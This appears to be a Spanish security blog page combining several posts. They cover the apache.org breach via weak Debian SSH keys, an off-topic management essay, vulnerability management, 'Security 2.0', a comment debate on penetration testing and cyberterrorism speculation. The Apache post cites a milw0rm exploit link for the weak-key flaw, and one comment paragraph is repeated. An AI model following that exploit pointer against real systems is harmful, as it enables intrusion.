Durante la mañana del viernes 28 de agosto apareció un mensaje en la página principal del sitio de apache.org indicando que el sitio había sido comprometido y que la fundación había dado de baja muchos de sus servicios como precaución. En un comunicado posterior la fundación dio a conocer que el problema se había debido a llaves SSH vulnerables y no un ataque especialmente dirigido sobre el servidor del sitio; la vulnerabilidad en cuestión es una debilidad en las llaves SSH generadas en sistemas Devian / Ubuntu, esta vulnerabilidad permitió el acceso al sitio y el robo de muchas contraseñas, sin embargo fue posible restaurar los datos desde un mirror del sistema.

La principal preocupación del equipo de Apache es que se pudiera haber comprometido la integridad del software que se distribuye mediante el sitio, ya que siendo apache uno de los servidores WEB mas utilizado esto pudiera haber significado una gran brecha de seguridad para muchas organizaciones que utilizan dicho software.

El equipo que administra la infraestructura de la fundación se encuentra actualmente investigando la posible intrusión en uno de sus servidores. Por razones de seguridad muchos servicios prestados por apache.org se encuentra aun fuera de línea.

Lo interesante es que la vulnerabilidad que fue usada, no es reciente y esto demuestra que hasta en las mejores familias existen problemas con vulnerabilidades antiguas.

Referencia

http://threatpost.com/blogs/apache-site-hacked-through-ssh-key-compromise-128

http://isc.sans.org/diary.html?storyid=7030

http://www.milw0rm.com/exploits/5622

Por Héctor Acevedo.

Antecedentes
La gerencia como proceso.
El liderazgo.
Importancia del liderazgo.
El desarrollo de los subordinados.
La evaluación y motivación de los subordinados.
El gerente y su jefe.
El gerente en la típica empresa mediana.

Antecedentes

Muchas empresas medianas en México están en un momento muy importante de su historia: son líderes en su medio y están experimentando crecimientos muy importantes en todos los sentidos (facturación, número de proyectos, número de colaboradores, etc.). Aunque sin duda todo ello constituye una excelente noticia, más en un país como el nuestro, es indudable que el acelerado crecimiento está imponiendo presiones extra a la operación de las empresas, que luchan por mantenerse al paso.

Bajo este escenario, una de las labores más importantes que la organización debe emprender es un programa de “institucionalización” mediante el cual convierta su cultura organizacional para pasar de ser una empresa tipo familiar  a una empresa con instituciones firmes y operando consistentemente.

Indudablemente el cuerpo gerencial será uno de los pilares más importantes en el cambio, y por ello cada gerente debe estar consciente de cómo puede contribuir al mismo.

Así pues, a continuación algunas ideas para que los actuales gerentes-operadores tomen en cuenta y contribuyan a que sus organizaciones den el siguiente paso en su evolución.

La gerencia como proceso.

Si se considera la gerencia desde el punto de vista de procesos, se tienen varias funciones dentro del proceso de ser gerente:

1. Planeación: Cuando la gerencia es vista como un proceso, planeación es la primera función que se ejecuta. Una vez que los objetivos han sido determinados, los medios necesarios para lograr estos objetivos son presentados como planes. Los planes de una organización determinan su curso y proveen una base para estimar el grado de éxito probable en el cumplimiento de sus objetivos. Los planes se preparan para actividades que requieren poco tiempo, años a veces), para completarse, así como también son necesarios para proyectos a corto plazo. Ejemplo de planes de largo alcance podemos encontrarlos en programas de desarrollo de productos y en las proyecciones financieras de una compañía. En la otra punta de la escala del tiempo, un supervisor de producción planea el rendimiento de su unidad de trabajo para un día o una semana de labor. Estos ejemplos representan extremos en la extensión de tiempo cubierta por el proceso de planeación, y cada uno de ellos es necesario para lograr los objetivos prefijados por la compañía.
2. Organización: Para poder llevar a la práctica y ejecutar los planes, una vez que estos han sido preparados, es necesario crear una organización. Es función de la gerencia determinar el tipo de organización requerido para llevar a cabo la realización de los planes que se hayan elaborado. La clase de organización que se haya establecido, determina, en buena medida, el que los planes sean apropiada e integralmente apropiados. A su vez los objetivos de una empresa y los planes respectivos que permiten su realización, ejercen una influencia directa sobre las características y la estructura de la organización. Una empresa cuyo objetivo es proveer techo y alimento al público viajero, necesita una organización completamente diferente de la de una firma cuyo objetivo es transportar gas natural por medio de un gasoducto.
3. Dirección: Esta tercera función gerencial envuelve los conceptos de motivación, liderazgo, guía, estímulo y actuación. A pesar de que cada uno de estos términos tiene una connotación diferente, todos ellos indican claramente que esta función gerencial tiene que ver con los factores humanos de una organización. Es como resultado de los esfuerzos de cada miembro de una organización que ésta logra cumplir sus propósitos, de ahí que, dirigir la organización de manera que se alcancen sus objetivos en la forma más óptima posible, es una función fundamental del proceso gerencial.
4. Control: La última fase del proceso gerencial es la función de control. Su propósito inmediato es medir cualitativamente y cuantitativamente, la ejecución en relación con los patrones de actuación y, como resultado de esta comparación, determinar si es necesario tomar acción correctiva o remediar que encauce la ejecución en línea con las normas establecidas. La función de control es ejercida continuamente, y aunque relacionada con las funciones de organización y dirección, está más íntimamente asociada con la función de planeamiento. La acción correctiva del control da lugar, casi invariablemente, a un replanteamiento de los planes; es por ello que muchos estudiosos del proceso gerencial consideran ambas funciones como parte de un ciclo continuo de planeamiento-control-planeamiento.

Entre las tendencias y demandas que Kernan ha identificado “para la gerencia del Siglo XXI” se encuentran las siguientes: transitar de la dimensión y escala, a la velocidad y capacidad de reacción; de la autoridad formal y el control de niveles altos, al otorgamiento y desarrollo de poder y facultades (empowerment); de la rigidez en las organizaciones, a las organizaciones flexibles y virtuales; del control por medio de reglas y jerarquías, al control por medio de visión y valores; del análisis racional y cuantitativo, a la creatividad y la intuición; de la necesidad de certeza, a la tolerancia a la ambigüedad; de la independencia y autonomía de la empresa, a la interdependencia y alianzas estratégicas; del enfoque organizacional interno, al enfoque en el medio competitivo; de la ventaja competitiva, a la ventaja cooperativa, entre otros.

En la función de dirección, las tendencias se mueven en las siguientes direcciones : de la autoridad, como factor de disciplina, al liderazgo, como elemento movilizador; de “dirigir a los hombres” a “dirigir con los hombres”; de los recursos humanos, como un “objeto” del proceso de dirección, a considerarlo como un “sujeto” clave, y participante; de la motivación, muchas veces manipuladora, a la creación de un sentido de pertenencia; de la delegación, al empowerment (facultar, dar poder, desarrollar).

En la función de control, se trabaja por moverse: de la autoridad, al autocontrol y compromiso; de la orientación hacia los procesos (decirle a cada cual “como” debe hacer las cosas), a los resultados (concretar lo “que” debe lograr), resumiendo que el jefe defina el “que” y el subordinado genere el “como”; los valores, como instrumento de orientación del comportamiento de los miembros de la organización, es a lo que Quinn  llama “control de clan”.

El liderazgo.

La visión que tienen en general los trabajadores de sus jefes es que éstos ordenan, mandan, deciden, dicen lo que se debe hacer, imponen criterios, distribuyen el trabajo, controlan y supervisan las tareas.

La preocupación del directivo debería estar centrada en crear una imagen tal, que su subordinado lo catalogue como un colaborador más, orientador, escucha de su gente, generador de confianza; aceptado naturalmente por el grupo, buen comunicador, persona que apoye y ayude, que transmite seguridad.

El mando que es líder trabaja para ser aceptado por su carisma y su servicio a un equipo que compra ayuda y orientación para cumplir con las metas prefijadas que se han negociado previamente.

El líder es el respaldo del equipo, el que potencia a las personas para que se desarrollen sus inquietudes, iniciativas y creatividad. Fomenta la responsabilidad, el espíritu de equipo, el desarrollo personal, y, especialmente, es el artesano de la creación de un espíritu de pertenencia que une a los colaboradores para decidir las medidas a tomar.

El liderazgo tendrá como consecuencia el atraer o arrastrar a los colaboradores de la empresa a cumplir  mejor, con responsabilidad y confianza, sus tareas y trabajos. Pondrán encima de la mesa una gran intensidad en la ejecución del trabajo, toda su experiencia y sus habilidades. El líder(,) no predica desde la sombra, se pone al frente, de forma que se le vea, anima, motiva, empuja, apoya y así tira del grupo en pos de las metas de la organización.

Pero el líder, para serlo, ha de ser creíble, auténtico. No postizo. Lo ficticio se nota y (así), al percibirlo los demás, impide los efectos positivos.

El liderazgo tiene mucho que ver con las habilidades para motivar y para inspirar confianza. El líder predica con el ejemplo y cree en lo que dice y por eso, actúa en consecuencia. El líder es, a la vez, exigente y comprensivo. Exige a los miembros de su equipo que cumplan con sus deberes y obligaciones, pero comprende sus circunstancias personales y sus características psicológicas.

El líder marca líneas claras y coherentes de acción, no zigzaguea continuamente. Confía en sus colaboradores, pero vigila que cumplan. El líder de primera, el auténtico, va siempre por delante y no se aparta ni se esconde.

Si los tiempos son duros, está ahí para animar y para trabajar. Si los tiempos son buenos, sigue para que no decaiga el esfuerzo.

Importancia del liderazgo.

• Es importante por ser la capacidad de un jefe para guiar y dirigir.
• Una organización puede tener una planeación adecuada, control y procedimiento de organización y no sobrevivir a la falta de un líder apropiado.
• Es vital para la supervivencia de cualquier negocio u organización.
• Por lo contrario, muchas organizaciones con una planeación deficiente y malas técnicas de organización y control han sobrevivido debido a la presencia de un liderazgo dinámico.

Es importante que el gerente esté en permanente auto evaluación, reflexionando y preguntándose si solo da instrucciones o se involucra realmente en el proceso de cambio que se quiere implementar. Sin perjuicio de esto, la reflexión que el gerente efectúe, puede ser tan profunda como el interés que tenga de administrar en forma contemporánea su empresa.

En su libro “Pasión por la Excelencia”, Tom Peters, identificó lo que llamó “gestión itinerante”, que se trata precisamente de la práctica de los líderes de estas empresas de realizar visitas y sostener encuentros frecuentes con el personal (además de los clientes y proveedores) y diferentes niveles de la organización. Una conclusión de Tom Peters es que esta práctica “Facilita la innovación y permite inculcar la idea de ciertos valores a cada miembro de la organización” y se pregunta “¿no será esto el liderazgo?”, por lo anterior concluye que “La gestión itinerante es la tecnología del liderazgo”.

El desarrollo de los subordinados.

Todo jefe es responsable de que sus subordinados se desarrollen cotidianamente, sin embargo esta responsabilidad no es asumida en todos los casos. El supervisor debe ayudar a sus subordinados a mejorar sus conocimientos, actitudes y conductas. La palabra adecuada para describir esta responsabilidad gerencial es la de “coaching”, al estilo de los entrenadores deportivos que ayudan constructivamente al crecimiento continuo de las personas que tienen a su cargo.

Dentro de las distintas tareas de un gerente, el desarrollo de los subordinados es una de las más importantes. También es, probablemente, la que requiere mayor madurez en el gerente, y mejor calidad de comunicación con su personal. Un gerente que no puede comunicarse adecuadamente con sus subordinados, difícilmente podrá contribuir en forma positiva y honesta a mejorar su desarrollo.

La evaluación y motivación de los subordinados.

La capacidad de evaluar la efectividad del trabajo de sus subordinados es un aspecto clave del trabajo de un jefe.

Se debe evaluar la calidad del trabajo, las condiciones en las que se lo realizó, la iniciativa y creatividad, la capacidad para trabajar en equipo y otros aspectos. Esta es la primera mitad de la responsabilidad de evaluación.

La segunda mitad de esta tarea gerencial se relaciona con la retroalimentación que se brinda a los subordinados sobre la forma en que están haciendo su trabajo. Esta retroalimentación, que es realmente la base del desempeño de un buen gerente, se relaciona con múltiples aspectos de la relación entre superior y subordinado.

Una correcta evaluación permite apreciar los esfuerzos que hacen las personas para cumplir con su trabajo, y los estimula para mejorar. También afecta no solo el desarrollo, el progreso -y el sueldo- de los subordinados, sino también su valoración personal y su autoestima.

Cuando las tareas de evaluación son realizadas adecuadamente, en realidad forman parte del proceso de desarrollo continuo de los subordinados: son constructivas y ayudan al subordinado a crecer en su rol, en un contexto de intercambio continuo y honesto de información.

La motivación ha de tener dos ramas de acción diferenciadas, pero que confluyen sobre cada empleado:

1. Motivación económica que, apoyándose en sueldos e incentivos, anime al trabajador a volcarse en su tarea y en su rendimiento personal.
2. Motivaciones psicológicas y personales que se apoyen en la ilusión del proyecto común, en la necesidad de mejorar en la calidad del trabajo, en la confianza que se deposita en él y en sus aportaciones, en las posibilidades de promoción personal (cuando esto sea factible) y motivación hacia la necesidad de ser competitivos frente a la competencia.

La comunicación requiere canales abiertos en la relación profesional, laboral y personal entre jefes y mandos intermedios, así como entre estos y sus subordinados. Requiere que esa comunicación sea de doble dirección, de arriba a abajo para transmitir órdenes, criterios, obligaciones, apoyos, consejos, información. Pero, también, de abajo a arriba para informar, preguntar, aportar ideas y soluciones.

Una empresa moderna ha de apoyarse en una circulación muy fluida de información real y veraz. Ningún colaborador debe ir en la oscuridad total sobre la marcha de la empresa, su lucha en el sector y en los mercados o sobre los objetivos que ha de conseguir. Y la dirección, por su parte, no puede caminar de espaldas a las realidades de su empresa, desinformada o con información incompleta o poco precisa.

El gerente y su jefe.

En estudios recientes se sugiere que los directivos eficaces dedican tiempo y esfuerzo a gestionar no sólo las relaciones con sus subordinados sino también con sus jefes. Dichos estudios también muestran que este aspecto esencial de la gestión es ocasionalmente ignorado por directivos que en otros campos parecen talentosos”

Otros especialistas también han identificado la necesidad de ocuparse de este asunto. Roger Fisher, lo desarrolla en uno de sus libros (“El Liderazgo Lateral. Cómo dirigir si usted no es el jefe”).

Las razones que fundamentan esto pueden ser las mismas que relacionadas con el tema de poder e influencia. Se trata de que los directivos, para lograr resultados, no sólo requieren la colaboración de sus subordinados sino también la de sus jefes, colegas y muchos otros que no están bajo su mando. Kotter relata experiencias en las cuales directivos que habían sido eficaces liderando a sus subordinados fracasaron porque no fueron capaces de manejar adecuadamente las relaciones con sus jefes.

El gerente en la típica empresa mediana.

En muchas de las empresas medianas y pequeñas en México se busca un estilo gerencial muy operativo, a diferencia de aquellos que, en el otro extremo, dicen que un gerente debe “gerenciar” el 80% de su tiempo y “operar” sólo el 20% restante.

Aunque cada caso es diferente, éste paradigma se debe en buena medida al hecho de los recursos son muy limitados cuando una empresa nace, lo que obliga a que los gerentes participen activamente en la operación de sus respectivas áreas para lograr mejores economías de escala.

Sin duda éste modelo es muy útil en los primeros años de la empresa, pero llega un momento en que es necesario replantearse el paradigma gerencial para afrontar con éxito el acelerado crecimiento que algunas organizaciones experimentan: ha llegado el momento en que hay que cambiar el balance de actividades de los gerentes:

Ahora bien ¿por qué hay que cambiar?  En el estado actual los gerentes son muy operativos y se ven forzados a dedicar muy poco tiempo a las 4 funciones establecidas con anterioridad (planeación, organización, dirección y control). Es muy común que hoy en día más que gerentes resulten un miembro más de su equipo, el miembro con más responsabilidades y funciones.

Aunque es obvio que las 4 funciones se ven afectadas por la falta de tiempo de los gerentes, quiero hacer especial énfasis en la parte de “dirección”. Como se apuntó anteriormente, esta función gerencial envuelve los conceptos de motivación, liderazgo, guía, estímulo y actuación y es allí donde muchos gerentes sufren más la falta de tiempo.

En resumen: están tan ocupados con la operación día a día y con las urgencias que no tienen tiempo de ser líderes. Y no se trata de si son buenos o malos líderes, esa discusión está fuera del alcance del presente documento. Se trata de resaltar que NO tienen tiempo para ser líderes:

• ¿Cómo ser líder de un equipo de trabajo cuando se tienen montones de pendientes operativos que hacer para “ayer”?
• ¿Cómo liderar a un equipo de trabajo cuando no se tiene tiempo para interaccionar con los miembros del mismo?

Esta falta de liderazgo es evidente en varias áreas de la organización:

1. Mucha gente se siente como remero en un barco de guerra romano: sólo saben que deben remar cada día más fuerte pero no tienen idea de por qué, a dónde van, ni cómo van.
2. Cada vez es más común que se conceptualice a los gerentes como simples jefes que sólo están para exigir cada vez más cosas por hacer, pero que nunca tienen tiempo para nada más.
3. En la economía actual el conocimiento adquirido en la práctica por otros es un bien casi invaluable, y no estamos logrando que los directores y gerentes sirvan como mentores para los nuevos elementos de la organización. De esta manera se pierde mucho conocimiento y alguien tiene que “redescubrirlo” tarde o temprano.
4. Cuando no hay canales formales de comunicación, el chisme de pasillo los reemplaza, con el consiguiente impacto en el clima organizacional de la empresa.

¿Cómo resolver esto? Sin duda hay muchos caminos diferentes a elegir, pero es tiempo de que cada gerente empiece a hacerse muchas preguntas sobre el papel que juega y, más importante aún, que jugará en la evolución y crecimiento de sus subordinados y de la organización.

En la actualidad cuando se habla de “Administración de vulnerabilidades” casi siempre se asocia a una herramienta tecnológica que ejecuta pruebas de vulnerabilidades a nuestra infra estructura tecnológica. Este podría ser un buen primer acercamiento, sin embargo es una visión incompleta, como lo dices John P. Pironti en el articulo Elements of an information Security Program la administración de incidentes y vulnerabilidades debe contener los elementos tanto reactivos como proactivos para entender que vulnerabilidades existen así como el riesgo de las mismas

Para poder cumplir con una administración completa se deben tener en cuentas al menos los rubros que se muestran la siguiente figura:

Administración de activos: Este rubro se relaciona en tener identificados y clasificados los activos tecnológicos de la organización. No se basa en tener un inventario simplemente, es llegar a tener el valor de pérdida o nos disponibilidad del activo (BIA).

• Conocer y tener definido que activo representa más valor para la organización basado en criticidad y sensibilidad. Con esto se le da un peso mayor al momento de proteger el activo.
• También se relaciona con el hecho darle la preferencia a un activo sobre otros al momento de remediar una vulnerabilidad.· 
• Análisis de vulnerabilidades a nivel de red: Este procedimiento debe bridar el descubrimiento de las vulnerabilidades de la infra estructura a nivel de red de datos y voz.
• Análisis de vulnerabilidades de nivel de equipo: Este procedimiento debe brindar el descubrimiento de las vulnerabilidades y configuraciones por defecto en nivel de dispositivo.
• Análisis de configuraciones: Debe permitirnos evaluar la configuración y optimización de nuestra infra estructura.
• Pruebas de penetración: Este procedimiento nos permite probar la robustez de nuestros controles de seguridad ya que no solamente descubre vulnerabilidad, también las explota para obtener la mayor penetración en un sistema.
• Análisis de código: Estudios de análisis de código nos permiten evaluar y conocer vulnerabilidades en aplicaciones hechas en casa, antes de que estén en producción.
• Alertas de fabricantes y sitios de seguridad: El mantenernos informados respecto a nuevos ataques y vulnerabilidades que pudieran afectar a nuestra infra estructura debe ser un punto crucial.
• Determina el nivel de protección requerido para los sistemas de información y está muy relacionada con el priorización.
• Determina el impacto de una vulnerabilidad descubierta en nuestra organización. Este es importante recalcar que no es lo mismo que para un fabricante una vulnerabilidad es de nivel Medio, cuando esta permitirá que la CIA de la información pueda ser comprometida y esta vulnerabilidad exista en el 95% de la nuestra infra estructura tecnológica; el trato que se le deba dar a esta vulnerabilidad debería ser de carácter crítico y no medio. Este procedimiento deberá permitirnos conocer el riesgo de la vulnerabilidad aplicado a la organización, con esto es posible definir la estrategia de remediación.

El poder contar con un programa integral de administración de vulnerabilidades involucra varias dentro y fuera de la organización. Algunos de los procesos incluso deben ser realizados por un tercero para lograr una verdadera imparcialidad de las cosas.

Como último punto es importante recalcar que la información es y sirve a la organización y que la seguridad informática es una herramienta más para cumplir los objetivos del negocio y esta debe alinearse a estos objetivos sin perder la visión de los mismos.

Darkslaker

El termino Security 2.0 lleva casi 10 años que se dio a conocer y está relacionado con orientar la seguridad informática a servicios integrales de seguridad. Esto nos permite tener métricas y mediciones con respecto a la seguridad en las organizaciones.

Para Symantec el Security 2.0 no es una aplicación o un servicio nuevo. Es la integración de software, servicios y alianzas que permiten proteger nuestro activo más preciado, la información, así como nuestras interacciones.

Según Thompson de Symantec, lograr esta confianza supone un nuevo enfoque, como el que presenta Security 2.0:
“En el corazón de este nuevo producto se encuentra el concepto de que el campo de batalla de la seguridad ya no está formado solamente por el dispositivo (como era el caso en Security 1.0), sino que ahora lo forman la información y las interacciones,”

Pete Herzog también comparte su punto de vista respecto: Security 2.0 tiene que ver con el cumplimiento (compliance) y la auditoría. Son las diferentes maneras de estar seguros de que algo es seguro, pero los medios en su mayoría son pobres. Gran parte del cumplimiento (compliance) se centra en la aplicación de la Seguridad 1.0.

En la actualidad el poder cumplir con los estándares y mejores prácticas, que leyes o instituciones marcan y rigen se ha convertido en la fuerza motriz que mueve la seguridad en el mundo. Cuando hablamos de ser ITIL Compliance, SOX Compliance, PCI Compliance o el estar certificados en algunos de los dominios del ISO 27001, etc, nos referimos a una manera de medir la seguridad 2.0. Esto es muy ambiguo y peligroso, si la preocupación por la seguridad se basa en pasar una auditoria y/o certificación estamos perdiendo el espíritu mismo de la seguridad y por lo tanto de la seguridad 2.0.

La seguridad 2.0 se basa en llevar el aseguramiento de la información no solo en tecnología como pueden ser firewalls, IDP/IPS, antivirus etc, si no verlo en tres grandes aspectos:

• Procesos y Procedimientos
• Gente(Personas)
• Tecnología

Procesos: Son grupos de actividades repetitivas e interrelacionadas encaminadas a producir mediante una o más transformaciones, una salida de mayor valor que las entradas.

Tecnología: Todo dispositivo de hardware, software que se implementa como controles para salvaguardar la confidencialidad, disponibilidad e integridad de la información.

Gente: Se refiere al personal que opera la tecnología basada en los procesos de la organización.

Para explicar este concepto usare un ejemplo real. Un servidor es comprometido por falta de un parche de seguridad ¿De quién es responsabilidad?, de la tecnología, si vemos este problema desde el punto de vista de seguridad 1.0, la tecnología fallo, esa visión es un poco limitada

Con la visión de la seguridad 2.0 se trataría de resolver las siguientes preguntas:

Procesos: ¿existe un proceso de administración de parches de seguridad?
Tecnología: ¿Existe un servidor de administración y distribución de parches de seguridad?
Gente: Se llevo a cabo el proceso de administración de parches de seguridad.

La seguridad informática, debe verse en los tres rubros anteriores.

La seguridad 2.0 trata de enseñar que la seguridad no es simplemente tecnología, es también educar a los administradores y los usuarios de la misma, todo esto mediante procesos y procedimientos marcados por las mejores prácticas y/o leyes, estándares etc.

Seguridad 2.0 no es un término nuevo y posiblemente no sea el mejor ya que con lleva muchos paradigmas como son seguridad en profundidad o manejo de identidades. Sin embargo los proveedores de servicios de seguridad informática actualmente manejan este concepto muy bien, y cuando ofrecen sus servicios, tienen una gama de productos integrales, que permiten abarcar gradualmente los aspectos antes mencionados. Se ofrecen servicios, de análisis y reingeniería de procesos y procedimientos, proyectos de difusión de seguridad, análisis de brechas, proyectos de certificación de cumplimiento de estándares. Todos ellos basados en las mejores prácticas, niveles de servicio y muchas otras cosas.

Para algunas personas como Pete Herzog Seguridad 2.0 debe morir ya, y recobrar fuerza Seguridad 3.0 y surgir seguridad 4.0, si esto es posible solo el tiempo lo dirá.

Referencias:
Security 2.0
http://www.symantec.com/es/mx/business/library/article.jsp?aid=security_20

Pete Herzog A Year-End Commentary

Seguridad 2.0
http://www.informationweek.com.mx/articulos.php?id_sec=46&id_art=4473&num_page=17959

Del security 1.0 al 2.0
http://www.redusers.com/noticias/del-security-10-al-security-20

http://www.schneier.com/blog/archives/2007/05/is_penetration.html

http://www.ranum.com/security/computer_security/editorials/point-counterpoint/pentesting.html

Miren mi opinión es esta.

Primero hacer el ROI para un PT es muy complicado. Aun que Securityfocus tiene un artículo por ahí interesante, aun así es difícil.

Muchas personas creen que un PT es buena idea para ver una radiografía de cómo están las cosas. Los análisis de brechas y la auditoria de dominios del BS o el ISO una de sus entradas son los famosos PT y los AV. Estándares como SoX dicen que se deben hacer PT dos veces por años pero he aquí algunas implicaciones.

Miren mi opinión es esta.

Primero hacer el ROI para un PT es muy complicado. Aun que Securityfocus tiene un artículo por ahí interesante, aun así es difícil.

Muchas personas creen que un PT es buena idea para ver una radiografía de cómo están las cosas. Los análisis de brechas y la auditoria de dominios del BS o el ISO una de sus entradas son los famosos PT y los AV. Estándares como SoX dicen que se deben hacer PT dos veces por años pero he aquí algunas implicaciones.

1) A quien contrato. Un black Hat, un ISS que cobra miles y miles de dólares, o alguna otra empresa que cobra bien tiene buen personal.

Si yo llegara a contratar a cualquiera de los tres cuál de ellos me daría más. Después de unas semanas de trabajo recibo su reporte y resulta que todos ingresaron a mis sistemas pero cada uno por un camino diferente que pasó aquí.

Es importante recordar que un PT o un Hackeo Ético, no te da todas las brechas ni caminos posibles para ingresar al sistema y que existen muchos aspectos importantes para que esto se logre.

Aun que tengas personal capacitado y certificado en lo que quieras, mucho de esto tiene que ver con el feeling y experiencia del equipo involucrado en el proyecto.

2) Que busca un PT huecos de seguridad vulnerabilidades? NO.

Un PT busca por cualquier medio ingresar a un sistema y no siempre es por vulnerabilidades, muchas veces son debilidades (ojo y es muy diferente a una vulnerabilidad), o descuidos. Pero no busca encontrar todos los caminos posibles, más bien busca ingresar a un sistema. Si lo que buscas es mas todos los caminos creo que un AV y un análisis de brechas te acerca más a eso.

3) Ya mucho se ha dicho, un PT es como parchar una llanta, a veces ya se requiere una cámara o incluso cambiar la llanta completa. El modelo de encuentra y parchar es más cara, a tira lo que hay y ponlo seguro desde un principio.

PD. Seguimos explotando vulnerabilidades del siglo paso que triste NO.

Darkslaker

1.- Como cuanto te quieres gastar para saber que tan vulnerable eres!? Porque si me das 2 pesos eso es lo que vas a obtener en el resultado, pero si quieres una prueba donde los alcances lleguen a la definición de los 6 ámbitos de la seguridad según la OSSTMM, pues te va a costar más! Y continuando con la misma metodología dice que se basa en la experiencia y feeling del tester. Entonces por consiguiente no te vas con una empresa patito, para que puedas desmitificar los resultados de tu PT, te informas antes con un experto. Y de acuerdo a tus necesidades decides si lo haces o no! O mejor aún, si estás obligado a ser compliance con SOX , ISO, GWAN , que se yo, es tu perro tu lo bañas!.

2.- Es una pérdida de tiempo, claro si los entregables son ilegibles y no sabes por dónde comenzar atacar el problema, sino eres técnico y solo sabes de números bonitos de finanzas pues requieres al menos de dos reportes por separado.

Si al contrario sabes que tienes bien definidos y difundidos tus procesos y procedimientos, planes de recuperación de desastres, planes de contingencia y de administración de parches, ya tienes al menos un poco menos de que preocuparte. Porque tan solo hablar de actualización de parches es muy tedioso y en estos momentos no sabemos si esta liberándose uno nuevo.

La seguridad física, controles y políticas son ya muy conocidas y enriquecidas con el usuario final, perfecto tienes todavía menos de que preocuparte. Solo que el nuevo elemento de la policía empresarial que te da servicio es muy amigable o mejor aún muy confiado y peor, no conoce como seguir el procedimiento. ¿Qué vas a hacer para remediarlo?

3.- Si en México no se ha registrado un incidente de seguridad grave, es porque los que lo han sufrido no quieren que se sepa, y ya contrataron los servicios outsourcing de expertos.

Falta malicia o decisión en la gente para llevar a cabo un ataque cyber-terrorista, pero de que se puede se puede.

Al menos se de más de uno.

No bastan los dispositivos de seguridad perimetral (IDS; firewall, etc, etc), no basta con dormir sabiendo que hoy no te paso nada. No sabes si despertaras mañana solicitando un Forense para tu sitio web.

Tienes a los mejores administradores de redes y telecomunicaciones, pero no sabes que están descontentos con el mísero sueldo y planean mandarte a la chin..a e irse con la competencia, ahhh y al menos darle unos cuantos de tus secretos o metodologías.

Jajaja, no sabes cuándo va a cambiar tu contraseña! Y no tendrás acceso a tu disco duro cifrado.

Mmm, piensalo. Es necesario un PT? Contratame!

Saludos.

Byte byte

P4r4n01ds.

En general, hacer ROI para seguridad es un terreno pantanoso, ¿Cómo puedes comprobar costos si estamos partiendo de riesgos y no fenómenos determinanticos?, creo que en este sentido la industria de la seguridad de información se parece más a la de las aseguradoras, sin embargo hay diferencias fundamentales que no viene al caso discutir ahora, eso es un tema que se cuece aparte.

Existe un “método” para hacer pen test que me gusta porque sirve para dar un panorama más amplio en cuanto a las vulnerabilidades (y debilidades por qué no?), se denomina “Attack tree” y en él vas construyendo tu vector de ataque PERO también documentas las otras ramas que pudiste haber tomado y se quedaron sin desarrollar por las restricciones de la tarea; a lo mejor un mapa así podría ser de mayor utilidad para un cliente *con idea*.

Me detengo un poco en el asunto del cliente *con idea* porque hay que aceptar la realidad de nuestro mercado -inclusive debemos sacar ventaja de ello, sin dejar de apuntalar el cómo vamos a tratar a un cliente que tenga mucha mayor idea, quizá un cliente extranjero-; en México no se ha evolucionado lo suficiente como para distinguir si un PT sirve o no, es la moda y hay que hacerlos, o es la única manera en que les puedes abrir los ojos en cuanto a qué tan patética es su seguridad – no que realmente vayan a hacer algo al respecto, pero ya tendrán a quién señalar y echar culpas-; en ese sentido los PT’s están que ni mandados a hacer en el contexto particular en el que estamos ahora, México 2007.

David Guitierrez

2) Que busca un PT huecos de seguridad vulnerabilidades? NO.
Tal vez lo que debo buscar es más que tipo de vulnerabilidades, debilidades, o descuidos tengo.

Entiendo que hay más de una forma de entrar a un servicio.
Pero si a todos los servicios entro por que faltan parches.
Me dice que como compañía debo concentrarme más en actualizar mis sistemas.

Si muchos de mis servicios son comprometidos por descuidos. Me dice que debo mejorar mi control de Calidad.

Si muchos son por Ingeniería Social, tal vez debería concentrarme más en capacitación.

Y me da un norte, de por donde se necesita invertir más respecto a la seguridad de la compañía.

Eso también se puede hacer con auditoría de procesos?
Si, pero ahí estas en operación normal.

En un Pen-Test, estas estresando al sistema.
Estresando al sistema salen más detalles que, en la operación normal, parecían correctos o normales.

Ahora que, si en el PT, solo damos un diagnostico de: “apestas ó tal vez apestas” pues como comenta el documento, no te sirve de mucho.

Lo que para mí es claro es, que es sólo una herramienta más de diagnostico, junto con la consultoría y auditoría. Después del diagnosticó debería de haber un plan de mejoría y remediación.

Extrapolando a medicina:
Puedes tener un check up normal (entrevistas),
Puedes hacer una prueba de esfuerzo para estresar el sistema (pen-test) para que salga algo que a simple vista no vez.
Te dice que andas mal necesitas dieta, hacer ejercicio y tomarte una pastillas carísimas. (Diagnostico y plan de mejoría/remediación)
Y te vale ma…s o menos un cacahuate y no haces nada. (No sigues los
quickhits)

Entonces sale la duda: ¿para que Jingados te hiciste el Buto checkup con “Pen-Testing” y todo?

Mhh.. Creo que lo que podemos hacer, es ver como cerrar el vendiendo la remediación.

O como hacer un plan de mejoría remediación.

Fernando Cajeme

En no pocas ocasiones se ha escrito y escuchado hablar en medios que no pertenecen a la corriente principal (mainstream como FOX, CNN, entre otros) de casos en los que han existido ataques de “ciber-secuestros”, en los cuales cierta información de organizaciones importantes es secuestrada -ocultada mediante cifrado con una llave que sólo los atacantes conocen o bien movida de sus repositorios originales hacia equipos controlados por los atacantes- negándole el acceso al personal legítimamente autorizado para usarla; para después exigir sumas importantes de dinero para entregar la llave que descifra los datos o para regresarla de alguna manera a los dueños de dicha información.

Para corroborar la veracidad de las historias, enfrentamos una gran desventaja: frecuentemente los incidentes no son reportados y los medios “tradicionales” filtran demasiado la información que nos llega; no obstante, si nos manejamos en el terreno de lo que es técnica y físicamente posible, éste tipo de ataques bien pueden ser -y así lo parece- la evolución en motivos y modos de operación de aquellos que sólo se conformaban con hacer “defaces” de páginas web famosas, potenciados por el involucramiento de mafias bien establecidas en el crimen “tradicional” que están viendo nuevas oportunidades en el ciberespacio.

Las condiciones para que un ataque sea considerado terrorismo son básicamente dos cuestiones, una es que los motivos son políticos -a diferencia de los ciber-secuestros-, y la otra que deben infundir terror en los entes sujetos del ataque. Tomando en cuenta lo anterior, y el hecho indiscutible de que cada vez más infraestructura, negocios, economía, y otros rubros que sustentan la civilización -como la conocemos- dependen directamente de sistemas informáticos, parece una línea muy delgada entre lo que se está filtrando en materia de la actividad del ciber-crimen y la posibilidad de un ataque similar pero con características de terrorismo se materialice.

En mi opinión, será cuestión de que alguien suficientemente financiado y suficientemente motivado, decida hacerlo.

Saludos!

David Gutierrez

Mi opinón, mmh?
Dime tu, tu accediste a la Red XXXXX. … je je je ..

Creo que el problema es que, muchos confían en que no suceda por que no han visto que haya sucedido ¡Aún!

Creo que como lo menciona “John Arquilla”, un punto es como un terrorista confiaría en un Hacker, y si a un Hacker realmente se interesaría en eso.

